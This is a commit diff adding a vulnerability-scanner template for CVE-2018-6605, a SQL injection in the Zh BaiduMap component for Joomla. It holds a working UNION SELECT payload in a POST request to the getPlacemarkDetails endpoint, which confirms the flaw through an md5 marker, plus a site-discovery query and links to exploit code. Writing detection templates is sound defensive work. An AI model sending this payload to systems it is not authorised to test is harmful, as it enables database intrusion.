Create CVE-2018-6605.yaml

http/cves/2018/CVE-2018-6605.yaml

@@ -0,0 +1,51 @@
+id: CVE-2018-6605
+
+info:
+  name: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.
+  reference:
+    - https://github.com/ARPSyndicate/cvemon
+    - https://github.com/C0reL0ader/EaST/blob/master/exploits/efa_joomla_zh_baidumap_sqli.py
+    - https://www.exploit-db.com/exploits/43974
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2018-6605
+    cwe-id: CWE-89
+    epss-score: 0.00282
+    epss-percentile: 0.67968
+    cpe: cpe:2.3:a:zh_baidumap_project:zh_baidumap:3.0.0.1:*:*:*:*:joomla\!:*:*
+  metadata:
+    max-request: 1
+    vendor: zh_baidumap_project
+    product: zh_baidumap
+    framework: joomla\!
+    fofa-query: app="Joomla!-网站安装"
+  tags: cve,cve2018,joomla,sqli
+
+variables:
+  num: "{{rand_int(2000000000, 2100000000)}}"
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+" 
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "{{md5(num)}}"
+          - "dataexists"
+        part: body
+
+      - type: status
+        status:
+          - 200